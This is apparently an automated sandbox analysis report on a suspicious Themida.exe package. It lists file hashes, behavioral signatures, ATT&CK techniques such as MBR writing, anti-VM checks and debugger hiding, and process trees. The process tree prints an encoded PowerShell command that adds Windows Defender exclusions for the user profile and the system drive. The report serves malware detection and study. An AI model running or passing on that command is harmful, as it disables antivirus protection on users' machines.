Overview
overview
9Static
static
3Themida.exe
windows7-x64
9Themida.exe
windows10-2004-x64
9ThemidaHelp.chm
windows7-x64
1ThemidaHelp.chm
windows10-2004-x64
1ThemidaSDK...in.dll
windows7-x64
3ThemidaSDK...in.dll
windows10-2004-x64
3ThemidaSDK...ct1.js
windows7-x64
3ThemidaSDK...ct1.js
windows10-2004-x64
3ThemidaSDK...e.html
windows7-x64
3ThemidaSDK...e.html
windows10-2004-x64
3ThemidaSDK...ib.dll
windows7-x64
1ThemidaSDK...ib.dll
windows10-2004-x64
1ThemidaSDK...64.dll
windows7-x64
1ThemidaSDK...64.dll
windows10-2004-x64
1ThemidaSDK...ram.js
windows7-x64
3ThemidaSDK...ram.js
windows10-2004-x64
3ThemidaSDK...64.dll
windows7-x64
1ThemidaSDK...64.dll
windows10-2004-x64
1ThemidaSDK...ity.js
windows7-x64
3ThemidaSDK...ity.js
windows10-2004-x64
3ThemidaSDK...llo.js
windows7-x64
3ThemidaSDK...llo.js
windows10-2004-x64
3ThemidaSDK...ct1.js
windows7-x64
3ThemidaSDK...ct1.js
windows10-2004-x64
3ThemidaSDK...ib.dll
windows7-x64
1ThemidaSDK...ib.dll
windows10-2004-x64
1ThemidaSDK...64.dll
windows7-x64
1ThemidaSDK...64.dll
windows10-2004-x64
1ThemidaSDK...ram.js
windows7-x64
3ThemidaSDK...ram.js
windows10-2004-x64
3ThemidaSDK...64.dll
windows7-x64
1ThemidaSDK...64.dll
windows10-2004-x64
1Analysis
-
max time kernel
145s -
max time network
132s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
22-08-2024 21:40
Static task
static1
Behavioral task
behavioral1
Sample
Themida.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Themida.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
ThemidaHelp.chm
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
ThemidaHelp.chm
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
ThemidaSDK/ExamplesSDK/Plugins/Examples/Delphi/TestPlugin.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
ThemidaSDK/ExamplesSDK/Plugins/Examples/Delphi/TestPlugin.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/C/CBuilder/Project1.js
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/C/CBuilder/Project1.js
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/C/Visual C++/vc_example.html
Resource
win7-20240729-en
Behavioral task
behavioral10
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/C/Visual C++/vc_example.html
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/ConsoleWrapper/ExternalDependencies/NativeAotLib.dll
Resource
win7-20240704-en
Behavioral task
behavioral12
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/ConsoleWrapper/ExternalDependencies/NativeAotLib.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/ConsoleWrapper/ExternalDependencies/SecureEngineSDK64.dll
Resource
win7-20240704-en
Behavioral task
behavioral14
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/ConsoleWrapper/ExternalDependencies/SecureEngineSDK64.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/ConsoleWrapper/Program.js
Resource
win7-20240704-en
Behavioral task
behavioral16
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/ConsoleWrapper/Program.js
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/NativeAotLib/SecureEngineSDK64.dll
Resource
win7-20240705-en
Behavioral task
behavioral18
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/NativeAotLib/SecureEngineSDK64.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral19
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/NativeAotLib/Security.js
Resource
win7-20240708-en
Behavioral task
behavioral20
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/NativeAOT/NativeAotLib/Security.js
Resource
win10v2004-20240802-en
Behavioral task
behavioral21
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/Rust/hello.js
Resource
win7-20240705-en
Behavioral task
behavioral22
Sample
ThemidaSDK/ExamplesSDK/Protectio Macros(Check Protection)/Rust/hello.js
Resource
win10v2004-20240802-en
Behavioral task
behavioral23
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/C/CBuilder/Project1.js
Resource
win7-20240729-en
Behavioral task
behavioral24
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/C/CBuilder/Project1.js
Resource
win10v2004-20240802-en
Behavioral task
behavioral25
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/NativeAOT/ConsoleWrapper/ExternalDependencies/NativeAotLib.dll
Resource
win7-20240708-en
Behavioral task
behavioral26
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/NativeAOT/ConsoleWrapper/ExternalDependencies/NativeAotLib.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral27
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/NativeAOT/ConsoleWrapper/ExternalDependencies/SecureEngineSDK64.dll
Resource
win7-20240708-en
Behavioral task
behavioral28
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/NativeAOT/ConsoleWrapper/ExternalDependencies/SecureEngineSDK64.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral29
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/NativeAOT/ConsoleWrapper/Program.js
Resource
win7-20240705-en
Behavioral task
behavioral30
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/NativeAOT/ConsoleWrapper/Program.js
Resource
win10v2004-20240802-en
Behavioral task
behavioral31
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/NativeAOT/NativeAotLib/SecureEngineSDK64.dll
Resource
win7-20240704-en
Behavioral task
behavioral32
Sample
ThemidaSDK/ExamplesSDK/Protection Macros/NativeAOT/NativeAotLib/SecureEngineSDK64.dll
Resource
win10v2004-20240802-en
General
-
Target
Themida.exe
-
Size
36.8MB
-
MD5
41d891deb3834051b417a0319617de54
-
SHA1
178ef0abf527be220aea88d3c55bdc6652aafb9b
-
SHA256
cb0ab86745f249494c39d86b3d712dcea2015699b3da927fd3ad1cd266388a21
-
SHA512
37bc5794a55d9f7eb5b3e2984a722279a2e1a4898b9d52af31361c4c6c17aeb5fcc83c8462469399ea2cc8d57031394193001670546de6d7592eeb7df962c483
-
SSDEEP
786432:rY9PYZKKRUk4wJ0hc7v83bsWpeS8gXMHiCu52Otx:rY9Qpxr7v83gKeSfXMCCC7
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Themida64.exe -
Checks BIOS information in registry 2 TTPs 3 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Themida64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Themida64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate Themida64.exe -
Executes dropped EXE 2 IoCs
pid Process 3040 Progman.exe 2772 Themida64.exe -
Loads dropped DLL 1 IoCs
pid Process 2772 Themida64.exe -
resource yara_rule behavioral1/files/0x000d0000000139f6-3.dat upx behavioral1/memory/3040-9-0x0000000140000000-0x00000001407A1000-memory.dmp upx -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Themida64.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Themida64.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2772 Themida64.exe 2772 Themida64.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Progman.exe Themida.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Themida64.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\CLSID\{b7c3410b-45b3-a8e5-a082-d545a584} Themida64.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node Themida64.exe Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\CLSID Themida64.exe Set value (data) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000_CLASSES\Wow6432Node\CLSID\{b7c3410b-45b3-a8e5-a082-d545a584}\SortOrderIndex = 0cb2608413d64033 Themida64.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2812 powershell.exe 2772 Themida64.exe 2772 Themida64.exe 2772 Themida64.exe 2772 Themida64.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2812 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2772 Themida64.exe 2772 Themida64.exe 2772 Themida64.exe 2772 Themida64.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1356 wrote to memory of 2812 1356 Themida.exe 30 PID 1356 wrote to memory of 2812 1356 Themida.exe 30 PID 1356 wrote to memory of 2812 1356 Themida.exe 30 PID 1356 wrote to memory of 3040 1356 Themida.exe 32 PID 1356 wrote to memory of 3040 1356 Themida.exe 32 PID 1356 wrote to memory of 3040 1356 Themida.exe 32 PID 1356 wrote to memory of 2772 1356 Themida.exe 33 PID 1356 wrote to memory of 2772 1356 Themida.exe 33 PID 1356 wrote to memory of 2772 1356 Themida.exe 33 PID 1356 wrote to memory of 2772 1356 Themida.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\Themida.exe"C:\Users\Admin\AppData\Local\Temp\Themida.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAYgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZABjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AbABhACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\Progman.exe"C:\Windows\Progman.exe"2⤵
- Executes dropped EXE
PID:3040
-
-
C:\Users\Admin\AppData\Local\Temp\Themida64.exe"C:\Users\Admin\AppData\Local\Temp\Themida64.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2772
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Obfuscated Files or Information
1Command Obfuscation
1Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30.5MB
MD5e0f0db8d1fd2c9a277f8e968977fa684
SHA1ae23b1e880bfade564e44759d01b965fda1f15d3
SHA2560486a1c12b05214b01ecf642e4c9c0159a767e507a4472cf8fda68deefe02786
SHA512347cd8dd2c4c5e9e84d111a8ecec77372e409aaa85c21f2c26ccca013467fad524d34c4ed6bc82386b5fa7eafe83531c0c81d63490b64e972cf68ce0001a1d9c
-
Filesize
6.3MB
MD58ec2fd013c3aceee5a693c588eb23aaf
SHA17a1694010b5663343b8688a2d2a875c515651b66
SHA2560e09fbf7d729e95eeb76a8afccf4a7d7b92c68e8eed551b8f4f8edc39e7ba631
SHA512820f1978c5f26276122c8f5063a9d5cd1ff8420ce3af85fbff22cdff5964fbb0a396cb6af2113f1bea0d82a758183252a1f3fdb0a5a9db15d1b2657138859dde
-
Filesize
8KB
MD554567e082e0e1987f13a6fe7e3431761
SHA1b3b3ae53bf362099ef7c593e37a1c8ba40576162
SHA25617db2ce42b83bb8fe64b29f187d97c88598753c177a8868684f62f9eacf5e244
SHA512b8608b98616019fbf22b48636e936df1e8a7987d8d56f749df54208bef65267212b7047893043cdc48801b2bff0faaf12c82934d251bf914424a170976e3f1d3